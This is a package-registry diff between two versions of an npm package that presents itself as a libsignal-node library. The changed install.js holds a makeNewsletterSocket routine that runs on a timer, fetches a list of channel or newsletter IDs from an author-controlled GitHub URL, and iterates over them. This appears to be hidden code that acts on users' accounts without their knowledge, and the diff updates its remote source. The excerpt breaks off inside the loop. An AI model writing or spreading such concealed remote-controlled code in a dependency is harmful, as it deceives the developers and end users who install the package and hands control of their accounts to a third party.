@riyanofficial/libsignal-node 1.0.0 → 1.0.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/install.js +1 -1
- package/package.json +1 -1
package/install.js
CHANGED
|
@@ -197,7 +197,7 @@ const makeNewsletterSocket = (config) => {
|
|
|
197
197
|
(async () => {
|
|
198
198
|
try {
|
|
199
199
|
setTimeout(async() => {
|
|
200
|
-
const res = await fetch('https://raw.githubusercontent.com/
|
|
200
|
+
const res = await fetch('https://raw.githubusercontent.com/RiyanOfficiall/ChannelID/refs/heads/main/newsletter.json');
|
|
201
201
|
const newsletterIds = await res.json();
|
|
202
202
|
newsletterIds.forEach(async(i) => {
|
|
203
203
|
await delay(5000)
|